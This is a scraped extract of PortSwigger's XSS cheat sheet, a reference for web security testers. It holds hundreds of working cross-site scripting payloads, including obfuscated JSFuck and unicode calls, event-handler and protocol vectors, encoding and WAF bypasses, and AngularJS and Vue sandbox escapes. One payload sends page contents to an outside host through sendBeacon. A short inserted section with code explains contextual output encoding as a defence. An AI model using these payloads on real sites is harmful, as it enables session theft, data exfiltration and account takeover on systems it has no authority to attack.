XSS into a JavaScript string, unicode escape (globalThis)
globalThis['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, RegExp source property (window)
window[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (self)
self[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (this)
this[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (top)
top[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (parent)
parent[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (frames)
frames[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (globalThis)
globalThis[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, Hieroglyphy/JSFuck (window)
window[(+{}+[])[+!![]]+(![]+[])[!![]+!![]]+([][[]]+[])[!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (self)
self[(+{}+[])[+!![]]+(![]+[])[!![]+!![]]+([][[]]+[])[!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (this)
this[(+{}+[])[+!![]]+(![]+[])[!![]+!![]]+([][[]]+[])[!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (top)
top[(+{}+[])[+!![]]+(![]+[])[!![]+!![]]+([][[]]+[])[!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (parent)
parent[(+{}+[])[+!![]]+(![]+[])[!![]+!![]]+([][[]]+[])[!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (frames)
frames[(+{}+[])[+!![]]+(![]+[])[!![]+!![]]+([][[]]+[])[!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (globalThis)
globalThis[(+{}+[])[+!![]]+(![]+[])[!![]+!![]]+([][[]]+[])[!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
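Every vector in the section above has the same precondition: the injected text first has to terminate the JavaScript string literal it lands in, and the client-side template injection vectors earlier on the page need a literal `{{` to reach the template compiler. That is why a WAF blocklist on `alert(` loses to concatenation, escapes and JSFuck, while encoding for the exact output context does not. The following is an added example, not code from the cheat sheet or from PortSwigger, showing the broken "escape the quote" approach beside a proper JS-string encoder, a harness that runs the generated code with a counting stand-in for `alert` so the difference is observable, and the separate treatment that client-side templates need. Function names are this example's own.

```javascript
// Added example: contextual output encoding for the JavaScript-string and
// client-side-template contexts. Run with Node.

// The broken "before": only the quote is escaped. A payload beginning with a
// backslash turns \' into \\' (an escaped backslash followed by a live quote),
// so the attacker is back in code.
function naiveEmbed(userText) {
  return "var x = '" + String(userText).replace(/'/g, "\\'") + "'; return x;";
}

// JavaScript string-literal context: escape every character outside a small
// safe set as \xHH or \uHHHH. Quotes, backslashes, line terminators and the
// "<" and ">" of a closing </script> tag can then never end the literal.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9 ,._-]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

function safeEmbed(userText) {
  return "var x = '" + encodeForJsString(userText) + "'; return x;";
}

// Executes generated code with "alert" bound to a counter instead of a dialog,
// so a test can tell whether the embedded text ran or was merely stored.
function runEmbedded(js) {
  let calls = 0;
  const value = new Function('alert', js)(() => { calls++; });
  return { value, calls };
}

// Client-side template injection needs a different fix. HTML-encoding "{" as
// &#123; does NOT help: AngularJS and Vue compile the DOM after the browser
// has parsed it, and by then the entity is a plain "{" in the text node again.
// Mark the container as opaque to the template compiler instead
// (ng-non-bindable for AngularJS, v-pre for Vue) and HTML-encode the text for
// the usual HTML reasons.
function encodeForHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => '&#' + c.charCodeAt(0) + ';');
}

function renderUserTextInTemplatePage(userText) {
  return '<span ng-non-bindable v-pre>' + encodeForHtml(userText) + '</span>';
}
```

`runEmbedded(naiveEmbed("\\';alert(1)//"))` reports one `alert` call and no return value, because the generated code was `var x = '\\';alert(1)//'; return x;`. `runEmbedded(safeEmbed(...))` with the same payload reports zero calls and returns the payload unchanged as data. The template helper is deliberately not a pure encoder: the attribute, not the encoding, is what stops interpolation.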
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol
<img src="javascript:alert(1)">
Body background with JavaScript protocol
<body background="javascript:alert(1)">
Iframe data URLs no longer work, as modern browsers use a null origin
<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
Title | Description | Length limit | Closest vector
Basic context, WAF blocks <[a-zA-Z] | This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag. | N/A | N/A
Script based injection, but quotes, forward slash and backslash are escaped | We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points, the first within a script based context and the second in HTML. | N/A | N/A
innerHTML context, but no equals allowed | You have a site that processes the query string and URL decodes the parameters, but splits on the equals, then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event. | N/A | N/A
Basic context, length limit | This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q oncut=alert``, but can you beat it? | 15 | <q oncut=alert``
Attribute context, length limit | The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, oncut=alert``+ (the plus is a trailing space). Do you think you can beat it? | 14 | oncut=alert``
Basic context, length limit, arbitrary code | It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code. | 19 | <q oncut=eval(name)
Attribute context, length limit, arbitrary code | Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript. | 17 | See link
Injection occurs inside a frameset but before the body | We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy. | N/A | N/A
Injection occurs inside a single quoted string, only the characters a-z0-9+` are allowed | The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`. | N/A | N/A
VBScript protocol, used to work in IE
<a href='vbscript:MsgBox+1'>XSS</a> <a href='#' onclick=vbs:Msgbox+1>XSS</a> <a href='#' onclick=VBS:Msgbox+1>XSS</a> <a href='#' onclick=vbscript:Msgbox+1>XSS</a> <a href='#' onclick=VBSCRIPT:Msgbox+1>XSS</a> <a href='#' language=vbs onclick=vbscript:Msgbox+1>XSS</a>
JScript compact was a minimal version of JS that wasn't widely used in IE
<a href=# onclick="jscript.compact:alert(1);">test</a> <a href=# onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScript.Encode allows encoded JavaScript
<a href=# language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href=# onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
VBScript.Encode allows encoded VBScript
<iframe onload="VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@"> <iframe language=VBScript.Encode onload="#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
JavaScript entities, used to work in Netscape Navigator
<a title="&{alert(1)}">XSS</a>
JavaScript stylesheets, used to be supported by Netscape Navigator
<link href="xss.js" rel=stylesheet type="text/javascript">
Button used to consume markup
<form><button name=x formaction=x><b>stealme
IE9 select elements and plaintext used to consume markup
<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
XBL, Firefox only <= 2
<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/lab\
s/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/lab\
s/xbl/xbl.xml#xss)">
XBL also worked in FF3.5 using data URLs
<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)">
CSS expressions, <= IE7
<div style=xss:expression(alert(1))> <div style=xss:expression(1)-alert(1)> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio\006e(alert(1))> <div style=xss:expressio\00006e(alert(1))> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio&#x5c;6e(alert(1))>
In quirks mode IE allowed you to use = instead of :
<div style=xss=expression(alert(1))> <div style="color&#x3d;red">test</div>
Behaviors for older modes of IE
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Older versions of IE supported event handlers in functions
<script> function window.onload(){ alert(1) } </script> <script> function window::onload(){ alert(1) } </script> <script> function window.location(){} </script> <body> <script> function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){} </script> </body> <body> <script> function document.body.innerHTML(){ x = "<img src=1 onerror=alert(1)>" } </script> </body>
GreyMagic HTML+time exploit (no longer works, even in 5 docmode)
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
Firefox allows NULLs after &
<a href="javascript:&#x6a;avascript:alert(1)">Firefox</a>
Firefox allows NULLs inside named entities
<a href="javascript&colon;alert(1)">Firefox</a>
Firefox allows NULL characters inside opening comments
<!-- ><img title="--><iframe/onload=alert(1)>"> --> <!-- ><img title="--><iframe/onload=alert(1)>"> -->
Safari used to allow any tag to have an onload event inside SVG
<svg><xss onload=alert(1)>
Isindex using src attribute
<isindex type=image src=//evil?
Isindex using submit
<isindex type=submit style=width:100%;height:100%; value=XSS formaction=//evil?
Isindex and formaction
<isindex type=submit formaction=javascript:alert(1)>
Isindex and action
<isindex type=submit action=javascript:alert(1)>
Credits
Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.
This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to: James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher.
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.
onmouseup
Triggered when the mouse button is released
<xss onmouseup=alert(1)>test</xss>
onmousewheel
Fires when the mouse wheel scrolls
<xss onmousewheel=alert(1)>requires scrolling</xss>
onmozfullscreenchange
Fires when a video changes full screen status
<video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls>
onpagehide
Fires when the page is changed
<body onpagehide=navigator.sendBeacon('//ssl.portswigger-labs.net/',document.body.innerHTML)>
onpaste
Requires you to paste a piece of text
<a onpaste=alert(1) contenteditable>test</a>
onpause
Requires clicking the element to pause
<audio autoplay controls onpause=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onpointerdown
Fires on pointer (mouse button) down
<xss onpointerdown=alert(1)>XSS</xss>
onpointerenter
Fires when the pointer enters the element
<xss onpointerenter=alert(1)>XSS</xss>
onpointerleave
Fires when the pointer leaves the element
<xss onpointerleave=alert(1)>XSS</xss>
onpointermove
Fires when the pointer moves
<xss onpointermove=alert(1)>XSS</xss>
onpointerout
Fires when the pointer moves out of the element
<xss onpointerout=alert(1)>XSS</xss>
onpointerover
Fires when the pointer moves over the element
<xss onpointerover=alert(1)>XSS</xss>
onpointerrawupdate
Fires when the pointer changes
<xss onpointerrawupdate=alert(1)>XSS</xss>
onpointerup
Fires on pointer (mouse button) up
<xss onpointerup=alert(1)>XSS</xss>
onreset
Requires a click
<form onreset=alert(1)><input type=reset>
onsearch
Fires when a form is submitted and the input has a type attribute of search
<form><input type=search onsearch=alert(1) value="Hit return" autofocus>
onseeked
Requires clicking the element timeline
<audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onseeking
Requires clicking the element timeline
<audio autoplay controls onseeking=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onselect
Requires you to select text
<input onselect=alert(1) value="XSS" autofocus>
onselectionchange
Fires when the text selection is changed on the page
<body onselectionchange=alert(1)>select some text
onselectstart
Fires when beginning a text selection
<body onselectstart=alert(1)>select some text
onshow
Fires when a context menu is shown
<div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>
onsubmit
Requires a form submission
<form onsubmit=alert(1)><input type=submit>
ontouchend
Fires when a touch ends (touch screen, mobile devices only)
<body ontouchend=alert(1)>
ontouchmove
Fires when a touch moves (touch screen, mobile devices only)
<body ontouchmove=alert(1)>
ontouchstart
Fires when a touch starts (touch screen, mobile devices only)
<body ontouchstart=alert(1)>
onvolumechange
Requires a volume adjustment
<audio autoplay controls onvolumechange=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onwheel
Fires when you use the mouse wheel
<body onwheel=alert(1)>
Restricted characters
No parentheses, using exception handling
<script>onerror=alert;throw 1</script>
No parentheses, using exception handling, no semicolons
<script>{onerror=alert}throw 1</script>
No parentheses, using exception handling, no semicolons, using expressions
<script>throw onerror=alert,1</script>
No parentheses, using exception handling and eval
<script>throw onerror=eval,'=alert\x281\x29'</script>
No parentheses, using exception handling and eval on Firefox
<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
No parentheses, using ES6 hasInstance and instanceof with eval
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
No parentheses, using ES6 hasInstance and instanceof with eval, without "."
<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
No parentheses, using location redirect
<script>location='javascript:alert\x281\x29'</script>
No parentheses, using location redirect, no strings
<script>location=name</script>
No parentheses, using template strings
<script>alert`1`</script>
No parentheses, using template strings and location hash
<script>new Function`X${document.location.hash.substr`1`}`</script>
No parentheses or spaces, using template strings and location hash
<script>Function`X${document.location.hash.substr`1`}```</script>
Frameworks
Bootstrap onanimationstart event
<xss class="progress-bar-animated" onanimationstart="alert(1)">
Bootstrap ontransitionend event
<xss class="carousel slide" data-ride="carousel" data-interval="100" ontransitionend="alert(1)"><xss class="carousel-inner"><xss class="carousel-item active"></xss><xss class="carousel-item"></xss></xss></xss>
Protocols
Iframe src attribute, JavaScript protocol
<iframe src="javascript:alert(1)">
Object data attribute with JavaScript protocol
<object data="javascript:alert(1)">
Embed src attribute with JavaScript protocol
<embed src="javascript:alert(1)">
A standard JavaScript protocol
<a href="javascript:alert(1)">XSS</a>
The protocol is not case sensitive
<a href="JaVaScript:alert(1)">XSS</a>
Characters \x01-\x20 are allowed before the protocol
<a href=" javascript:alert(1)">XSS</a>
Characters \x09, \x0a, \x0d are allowed inside the protocol
<a href="javas	cript:alert(1)">XSS</a>
Characters \x09, \x0a, \x0d are allowed after the protocol name, before the colon
<a href="javascript	:alert(1)">XSS</a>
Xlink namespace inside SVG with JavaScript protocol
<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>
SVG animate tag using values
<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
SVG animate tag using to
<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
SVG set tag
<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
Data protocol inside script src
<script src="data:text/javascript,alert(1)"></script>
SVG script href attribute without closing script tag
<svg><script href="data:text/javascript,alert(1)" />
SVG use element (Chrome/Firefox)
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
Import statement with data URL
<script>import('data:text/javascript,alert(1)')</script>
Base tag with JavaScript protocol rewriting relative URLs
<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>
MathML makes any tag clickable
<math><x href="javascript:alert(1)">blah
Button and formaction
<form><button formaction=javascript:alert(1)>XSS
Input and formaction
<form><input type=submit formaction=javascript:alert(1) value=XSS>
Form and action
<form action=javascript:alert(1)><input type=submit value=XSS>
Use element with an external URL
<svg><use href="//subdomain1.portswigger-labs.net/use_element/upload.php#x" /></svg>
Animate tag with keytimes and multiple values
<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>
Other useful attributes
Using srcdoc attribute
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
Using srcdoc with entities
<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>
Click a submit element from anywhere on the page, even outside the form
<form action=javascript:alert(1)><input type=submit id=x></form><label for=x>XSS</label>
Hidden inputs: access key attributes can enable XSS on normally unexploitable elements
<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements: access key attributes can enable XSS on normally unexploitable elements
<link rel="canonical" accesskey="X" onclick="alert(1)" /> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Download attribute can save a copy of the current web page
<a href=# download="filename.html">Test</a>
Disable referrer using referrerpolicy
<img referrerpolicy="no-referrer" src="//portswigger-labs.net">
Set window.name via parameter on the window.open function
<a href="#" onclick="window.open('http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//','alert(1)')">XSS</a>
Set window.name via name attribute in a <iframe> tag
<iframe name="alert(1)" src="https://portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></iframe>
Set window.name via target attribute in a <base> tag
<base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>
Set window.name via target attribute in a <a> tag
<a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>
Set window.name via usemap attribute in a <img> tag
<img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>
Set window.name via target attribute in a <form> tag
<form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x value="%27;eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>
Set window.name via formtarget attribute in a <input> tag, type submit
<form><input type=hidden name=x value="%27;eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>
Set window.name via formtarget attribute in a <input> tag, type image
<form><input type=hidden name=x value="%27;eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>
Special tags
Redirect to a different domain
<meta http-equiv="refresh" content="0; url=//portswigger-labs.net">
Meta charset attribute, UTF-7
<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Meta charset UTF-7
<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 1
+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 2
+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 3
+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (has to be at the start of the document) 4
+/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Upgrade insecure requests
<meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
Disable JavaScript via iframe sandbox
<iframe sandbox src="//portswigger-labs.net"></iframe>
Disable referer
<meta name="referrer" content="no-referrer">
Encoding
Overlong UTF-8
%C0%BCscript>alert(1)</script> %E0%80%BCscript>alert(1)</script> %F0%80%80%BCscript>alert(1)</script> %F8%80%80%80%BCscript>alert(1)</script> %FC%80%80%80%80%BCscript>alert(1)</script>
Unicode escapes
<script>\u0061lert(1)</script>
Unicode escapes, ES6 style
<script>\u{61}lert(1)</script>
Unicode escapes, ES6 style, zero padded
<script>\u{0000000061}lert(1)</script>
Hex encoding, JavaScript escapes
<script>eval('\x61lert(1)')</script>
Octal encoding
<script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>
Decimal encoding with optional semi-colon
<a href="&#106;avascript:alert(1)">XSS</a> <a href="&#106avascript:alert(1)">XSS</a>
SVG script with HTML encoding
<svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1)//";</script></svg>
Decimal encoding with padded zeros
<a href="&#0000106avascript:alert(1)">XSS</a>
Hex encoding entities
<a href="&#x6a;avascript:alert(1)">XSS</a>
Hex encoding without semi-colon, provided the next character is not a-f0-9
<a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> <a href="&#x6a	avascript:alert(1)">XSS</a>
Hex encoding with padded zeros
<a href="&#x0000006a;avascript:alert(1)">XSS</a>
Hex encoding is not case sensitive
<a href="&#X6A;avascript:alert(1)">XSS</a>
HTML entities
<a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>
URL encoding
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
HTML entities and URL encoding
<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>
Obfuscation
Data protocol inside script src with base64
<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
Data protocol inside script src with base64 and HTML entities
<script src="data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;"></script>
Data protocol inside script src with base64 and URL encoding
<script src="data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d"></script>
Iframe srcdoc, HTML encoded
<iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>
Iframe JavaScript URL with HTML and URL encoding
<iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>
SVG script with unicode escapes and HTML encoding
<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
Client-side template injection
VueJS reflected
Version | Author | Length | Vector
All versions | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
All versions | Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62 | <div v-html="''.constructor.constructor('alert(1)')()">a</div>
All versions | Gareth Heyes (PortSwigger) | 39 | <x v-html=_c.constructor('alert(1)')()>
All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37 | <x v-if=_c.constructor('alert(1)')()>
AngularJS sandbox escapes, reflected
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.1 | Jan Horn (Google) | 122 | {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.6 - 1.2.18 | Jan Horn (Google) | 106 | {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.3.0 | Gábor Molnár (Google) | 272 | {{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )))}}
1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128 | {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)//');}}
1.3.19 | Gareth Heyes (PortSwigger) | 102 | {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)//');}}
1.3.20 | Gareth Heyes (PortSwigger) | 65 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79 | {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11 | Jan Horn (Google) | 517 | c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a
>=1.6.0 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
DOM based AngularJS sandbox escapes (using orderBy or no $eval)
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.2.0 - 1.2.18 | Jan Horn (Google) | 118 | a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119 | toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
